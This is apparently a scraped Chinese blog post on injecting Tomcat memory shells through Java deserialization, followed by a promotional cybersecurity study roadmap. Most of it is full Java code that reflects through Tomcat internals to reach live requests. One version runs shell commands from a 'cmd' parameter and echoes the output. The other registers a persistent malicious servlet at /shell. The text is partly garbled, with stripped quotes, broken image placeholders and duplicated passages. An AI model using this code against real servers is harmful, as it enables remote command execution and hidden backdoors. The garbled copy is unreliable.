电子商务网站建设需要学什么,物流官方网站建设方案,视频网站开发与制作,网站建设CEO前言
对于回显的获取主要是在ApplicationFilterChain类的lastServicedRequest / lastServicedResponse两个属性#xff0c;是使用的ThreadLocal进行修饰的#xff0c;并且#xff0c;在执行请求的过程中#xff0c;通过反射修改属性值#xff0c;能够记录下当前线程的req…前言
对于回显的获取主要是在ApplicationFilterChain类的lastServicedRequest / lastServicedResponse两个属性是使用的ThreadLocal进行修饰的并且在执行请求的过程中通过反射修改属性值能够记录下当前线程的request对象的值。
之后在反序列化利用过程中方便利用ThreadLocal取出对应的request进行内存马的注入关键步骤。
这里转而通过寻找全局存储的request / response进行内存马的注入操作。
正文
如何获取的回显
师傅通过这种方式关注到了org.apache.coyote.AbstractProcessor类中存在有两个属性值名为request / response分别是使用final修饰的org.apache.coyote.Request / org.apache.coyote.Response类型的变量。 我们的目标是注入一个内存马这里以上篇一样的Servlet内存马举例说明。
对于Servlet内存马我们需要获取到对应ServletContext但是在org.apache.coyote.Request类中并没有直接可以获取的方法存在我们可以关注到该类的setNote方法的实现。 这个方法是用来存放私有数据的在其中举了一个例子其中描述了对于该类的notes数组中的下标为1的位置是用来存放的HttpServletRequest对象的值得注意的是其中的0-8序号存放的是servlet Container中的数据9-16序号存放的是connector这个组件的数据。
因为只要获取到了HttpServletRequest对象也就能够调用getServletContext方法获取我们需要的上下文。
我们可以通过getNote(1)来获取
好了言归正传转到获取request对象
在一个Controller调用过程中其中的Http11Processor类是继承了AbstractProcessor这个类的。 所以我们只需要获取到Http11Processor类对象我们就能够成功获取到我们需要的request对象
目标放在调用Http11Processor之前是否对该对象进行持久化存储或者直接点对其中的request对象进行了持久化存储 我们进而关注到了AbstractProtocol$ConnectionHandler类中在调用process方法的过程中调用了register方法对processor对象进行了存储。 传入的是processor他到底是什么我们可以追溯到该方法的开头存在有来源。 我们可以知道这个processor对象是获取的是当前的Http11Processor对象
对于register方法我们可以跟进一下。 首先从processor中获取了RequestInfo对象的信息之后调用了setGlobalProcessor方法。 调用了addRequestProcessor方法进行添加。 也即是将其添加进入了processors这个List对象中 所以现在我们的目的是获取到AbstractProtocol$ConnectionHandler类的global属性值也即是获取到AbstractProtocol这个类对象。
在调用这一步之后看起发现了在CoyoteAdapter#service方法中存在有Connector对象的操作。 对于Connector对象 这是一个connector组件的一个实现
其中存在有一个protocolHandler属性是一个ProtocolHandler类对象。 前面我们需要获取的是AbstractProtocol类对象同样是实现了这个接口
而且于HTTP连接相关的类都实现了这个接口的 所以我们能够从该属性中获取到我们需要的AbstractProtocol对象值
现在我们需要获取的对象就是一个Connector对象
而对于连接器的创建在tomcat容器进行启动的时候将会调用setConnector方法将connector放在service中去也即是StandardService类对象。
对于StandardService的获取我们可以直接从当前线程中进行获取。 这样一条链子进行成了
总结一下
StandardServiceconnectorConnector.protocolHandlerHttp11NioProtocol.handlerAbstractProtocol$ConnectionHandler.globalRequestGroupInfo.processorsRequestInfo.req
构造回显内存马
非持久化
这种应该也不算是内存马吧也就是每次发送发序列化数据的时候通过利用获取的request / response进行命令执行和回显。
对于实验的环境同样使用的是前面一样的环境 – 使用springboot搭建的环境
我首先创建了一个getField方法方便获取属性值。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BkMyweEN-1676903749903)(https://image.3001.net/images/20221117/1668680244_63760a3476abc1cccbd7a.png!small)]
将具体逻辑放在了static代码块中。
值得注意的有两点 在进行connector的筛选中调用了getScheme().toLowerCase().contains(http)方法来帅选和http相关的连接器。 在命令执行的位置通过判断有无特征来决定是否执行命令。 完整的实现
// 从线程中获取类加载器WebappClassLoaderBaseWebappClassLoaderBase contextClassLoader (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();// 获取TomcatEmbeddedContext对象Context context contextClassLoader.getResources().getContext();// 从上下文中获取ApplicationContext对象ApplicationContext applicationContext (ApplicationContext) getField(context, Class.forName(org.apache.catalina.core.StandardContext).getDeclaredField(context));// 从Application中获取StandardService对象StandardService standardService (StandardService) getField(applicationContext, Class.forName(org.apache.catalina.core.ApplicationContext).getDeclaredField(service));// 从StandardService中获取Connector数组Connector[] connectors standardService.findConnectors();for (Connector connector : connectors) {if (connector.getScheme().toLowerCase().contains(http)) {// 获取Connector对象的protocolHandler属性值ProtocolHandler protocolHandler connector.getProtocolHandler();// 筛选我们需要的Abstractif (protocolHandler instanceof AbstractProtocol) {// 从Http11NioProtocol对象中获取到handler属性也即是AbstractProtocol中的handler属性存在有一个getHandler方法可以直接返回// 反射获取该方法Method getHandler Class.forName(org.apache.coyote.AbstractProtocol).getDeclaredMethod(getHandler);getHandler.setAccessible(true);AbstractEndpoint.Handler handler (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);// 从上面获取的handler中取出global属性值RequestGroupInfo global (RequestGroupInfo) getField(handler, Class.forName(org.apache.coyote.AbstractProtocol$ConnectionHandler).getDeclaredField(global));// 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象元素是RequestInfo对象ArrayList processors (ArrayList) getField(global, Class.forName(org.apache.coyote.RequestGroupInfo).getDeclaredField(processors));// 遍历List中的元素for (Object processor : processors) {RequestInfo requestInfo (RequestInfo) processor;// 获取对应的Request对象org.apache.coyote.Request req (org.apache.coyote.Request) getField(requestInfo, Class.forName(org.apache.coyote.RequestInfo).getDeclaredField(req));// 通过不同的请求进行处理if ((req.queryString()).toString().toLowerCase().contains(cmd)) {// 获取对应的Request对象org.apache.catalina.connector.Request request (org.apache.catalina.connector.Request) req.getNote(1);// 执行希望执行的命令String cmd request.getParameter(cmd);String[] cmds null;if (cmd ! null) {if (System.getProperty(os.name).toLowerCase().contains(win)) {cmds new String[] {cmd.exe, /c, cmd};} else {cmds new String[] {/bin/bash, -c, cmd};}java.util.Scanner c new java.util.Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\\A);String o null;o c.hasNext() ? c.next() : o;c.close();PrintWriter writer request.getResponse().getWriter();writer.println(o);writer.flush();writer.close();}}测试一下
首先通过CC6_plus生成序列化数据1.ser
发送给漏洞端。 在访问路由中添加了一个cmd的GET传参最后能够发现成功执行了的。
持久化
对于持久化也就是真正的内存马实现主要是通过和前面的Tomcat Servlet内存马相结合的模式
也即是从request对象中获取到了ServletContext对象来执行恶意逻辑。
完整实现
// 从线程中获取类加载器WebappClassLoaderBaseWebappClassLoaderBase contextClassLoader (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();// 获取TomcatEmbeddedContext对象Context context contextClassLoader.getResources().getContext();// 从上下文中获取ApplicationContext对象ApplicationContext applicationContext (ApplicationContext) getField(context, Class.forName(org.apache.catalina.core.StandardContext).getDeclaredField(context));// 从Application中获取StandardService对象StandardService standardService (StandardService) getField(applicationContext, Class.forName(org.apache.catalina.core.ApplicationContext).getDeclaredField(service));// 从StandardService中获取Connector数组Connector[] connectors standardService.findConnectors();for (Connector connector : connectors) {if (connector.getScheme().toLowerCase().contains(http)) {// 获取Connector对象的protocolHandler属性值ProtocolHandler protocolHandler connector.getProtocolHandler();// 筛选我们需要的Abstractif (protocolHandler instanceof AbstractProtocol) {// 从Http11NioProtocol对象中获取到handler属性也即是AbstractProtocol中的handler属性存在有一个getHandler方法可以直接返回// 反射获取该方法Method getHandler Class.forName(org.apache.coyote.AbstractProtocol).getDeclaredMethod(getHandler);getHandler.setAccessible(true);AbstractEndpoint.Handler handler (AbstractEndpoint.Handler) getHandler.invoke(protocolHandler);// 从上面获取的handler中取出global属性值RequestGroupInfo global (RequestGroupInfo) getField(handler, Class.forName(org.apache.coyote.AbstractProtocol$ConnectionHandler).getDeclaredField(global));// 之后从上面获取的RequestGroupInfo对象中获取到processors这个List对象元素是RequestInfo对象ArrayList processors (ArrayList) getField(global, Class.forName(org.apache.coyote.RequestGroupInfo).getDeclaredField(processors));// 遍历List中的元素for (Object processor : processors) {RequestInfo requestInfo (RequestInfo) processor;// 获取对应的Request对象org.apache.coyote.Request req (org.apache.coyote.Request) getField(requestInfo, Class.forName(org.apache.coyote.RequestInfo).getDeclaredField(req));org.apache.catalina.connector.Request request (org.apache.catalina.connector.Request) req.getNote(1);ServletContext servletContext request.getServletContext();String name xxx;if (servletContext.getServletRegistration(name) null) {StandardContext o null;// 从 request 的 ServletContext 对象中循环判断获取 Tomcat StandardContext 对象while (o null) {Field f servletContext.getClass().getDeclaredField(context);f.setAccessible(true);Object object f.get(servletContext);if (object instanceof ServletContext) {servletContext (ServletContext) object;} else if (object instanceof StandardContext) {o (StandardContext) object;}}//自定义servletServlet servlet new TomcatMemshell1();//用Wrapper封装servletWrapper newWrapper o.createWrapper();newWrapper.setName(name);newWrapper.setLoadOnStartup(1);newWrapper.setServlet(servlet);//向children中添加Wrappero.addChild(newWrapper);//添加servlet的映射o.addServletMappingDecoded(/shell, name);简单测试一下
启动反序列漏洞环境
发送序列化数据 成功进行反序列化 验证是否成功注入 成功创建了一个恶意的Servlet。
Ref
https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java
https://xz.aliyun.com/t/7348
eg-1676903749904)]
成功进行反序列化
[外链图片转存中…(img-bYsLbwu5-1676903749905)]
验证是否成功注入
[外链图片转存中…(img-RndosYZ0-1676903749905)]
成功创建了一个恶意的Servlet。
Ref
https://github.com/Litch1-v/ysoserial/blob/master/src/main/java/ysoserial/payloads/util/Gadgets.java
https://xz.aliyun.com/t/7348
最后
分享一个快速学习【网络安全】的方法「也许是」最全面的学习方法 1、网络安全理论知识2天 ①了解行业相关背景前景确定发展方向。 ②学习网络安全相关法律法规。 ③网络安全运营的概念。 ④等保简介、等保规定、流程和规范。非常重要
2、渗透测试基础一周 ①渗透测试的流程、分类、标准 ②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking ③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察 ④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础一周 ①Windows系统常见功能和命令 ②Kali Linux系统常见功能和命令 ③操作系统安全系统入侵排查/系统加固基础
4、计算机网络基础一周 ①计算机网络基础、协议和架构 ②网络通信原理、OSI模型、数据转发流程 ③常见协议解析HTTP、TCP/IP、ARP等 ④网络攻击技术与网络安全防御技术 ⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作2天 ①数据库基础 ②SQL语言基础 ③数据库安全加固
6、Web渗透1周 ①HTML、CSS和JavaScript简介 ②OWASP Top10 ③Web漏洞扫描工具 ④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等 恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k。
到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗
想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取 扫下方二维码免费领取
有了这些基础如果你要深入学习可以参考下方这个超详细学习路线图按照这个路线学习完全够支撑你成为一名优秀的中高级网络安全工程师
高清学习路线图或XMIND文件点击下载原文件
还有一些学习中收集的视频、文档资源有需要的可以自取 每个成长路线对应板块的配套视频 当然除了有配套的视频同时也为大家整理了各种文档和书籍资料工具并且已经帮大家分好类了。 因篇幅有限仅展示部分资料需要的可以【扫下方二维码免费领取】